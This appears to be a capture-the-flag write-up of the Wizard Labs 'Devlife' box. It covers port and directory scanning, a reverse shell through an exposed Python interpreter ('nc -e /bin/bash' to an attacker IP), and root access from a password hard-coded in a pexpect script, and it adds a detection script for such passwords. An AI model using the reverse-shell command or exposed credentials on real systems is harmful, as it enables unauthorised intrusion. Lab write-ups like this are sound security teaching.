Quick Summary

Hey guys, this is my write-up about Devlife from Wizard Labs, which is their second box to retire. Just like Dummy, it’s another easy box (Difficulty: 2/10). It’s a Linux box and its IP is 10.1.1.20, so let’s jump right in!


Nmap

We will start with nmap to scan for open ports and services:

nmap -sV -sT -sC 10.1.1.20

Only 2 ports are open: 22 running ssh and 80 running http. Let’s check http.


HTTP Initial Enumeration

On the main page we get this “About me” message and nothing else:

About Me

Hello , My name is Teddy Smith , I am a Python developer since 2007 !

Here I gonna share some Django tutorials and tutorials about System Administation in Python also I will write a Python online interpreter !!

Stay Tuned ...

TS

I ran gobuster with /usr/share/wordlists/dirb/common.txt and got these results:

/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/.hta (Status: 403)
/dev (Status: 301)
/index.html (Status: 200)
/manual (Status: 301)
/server-status (Status: 403)



Getting user

So I checked /dev and found this Online Python 2.7 Interpreter:

Great, now we can get a reverse shell in many ways. I just imported os, then did os.system(reverse shell payload):

import os;os.system('nc -e /bin/bash 10.xx.xx.xx 1337')

And we owned user!



Stored root Credentials, Privilege Escalation

In the /home directory of tedd there is a directory called .env. Let’s check that.



We notice a Python script called su.py, which runs su root and uses the password to authenticate:

import pexpect
child = pexpect.spawn('su root')
child.expect ('Password:')
child.sendline('teddyxy2019')
child.expect('\$')
child.sendline('whoami')

Now we can su to root using the password teddyxy2019:

And we owned root!
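From the defender's side, a password hard-coded into a pexpect script like su.py can be found by static inspection before anyone else reads the file. The following is an added example, not part of the original write-up or the box: it parses a script with Python 3's ast module and reports string literals sent in answer to a password prompt. The function names and the sample (a constructed copy of su.py with a placeholder password) are assumptions made for illustration.

```python
import ast
import re
import warnings

# Prompts whose answer is a secret (e.g. the 'Password:' prompt printed by su).
PROMPT_RE = re.compile(r"pass(word|phrase)", re.IGNORECASE)

# Constructed sample shaped like the su.py above; the password is a placeholder.
SAMPLE = r"""import pexpect
child = pexpect.spawn('su root')
child.expect ('Password:')
child.sendline('CONSTRUCTED-PASSWORD')
child.expect('\$')
child.sendline('whoami')
"""

def _literal(node):
    """Return the text of a str/bytes literal node, or None for anything else."""
    if isinstance(node, ast.Constant) and isinstance(node.value, (str, bytes)):
        v = node.value
        return v.decode("utf-8", "replace") if isinstance(v, bytes) else v
    return None

def find_hardcoded_prompt_answers(source):
    """Return [(line, literal)] for literals sent right after a password prompt."""
    with warnings.catch_warnings():
        warnings.simplefilter("ignore")  # legacy escapes such as '\$' only warn
        tree = ast.parse(source)
    # Collect obj.method(arg, ...) calls and put them back in source order,
    # because ast.walk() does not guarantee it.
    calls = [
        (n.lineno, n.col_offset, n.func.attr, n.args[0])
        for n in ast.walk(tree)
        if isinstance(n, ast.Call) and isinstance(n.func, ast.Attribute) and n.args
    ]
    findings, awaiting = [], False
    for lineno, _col, name, arg in sorted(calls, key=lambda c: c[:2]):
        text = _literal(arg)
        if name in ("expect", "expect_exact"):
            # Only a literal prompt that looks like a password request arms the check.
            awaiting = text is not None and bool(PROMPT_RE.search(text))
        elif name in ("send", "sendline") and awaiting:
            awaiting = False
            if text is not None:  # a variable or env lookup is not a stored secret
                findings.append((lineno, text))
    return findings

if __name__ == "__main__":
    for line, secret in find_hardcoded_prompt_answers(SAMPLE):
        print("line %d: hard-coded answer to a password prompt (%d chars)" % (line, len(secret)))
```

Any hit means the password should be rotated and the script replaced with something that does not need the secret on disk, such as a narrowly scoped sudoers rule.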



That’s it, feedback is appreciated!

Don’t forget to read the previous write-ups, tweet about the write-up if you liked it, and follow on Twitter for awesome resources: @Ahm3d_H3sham

Thanks for reading.

Previous Wizard Labs Write-up: Wizard Labs - Dummy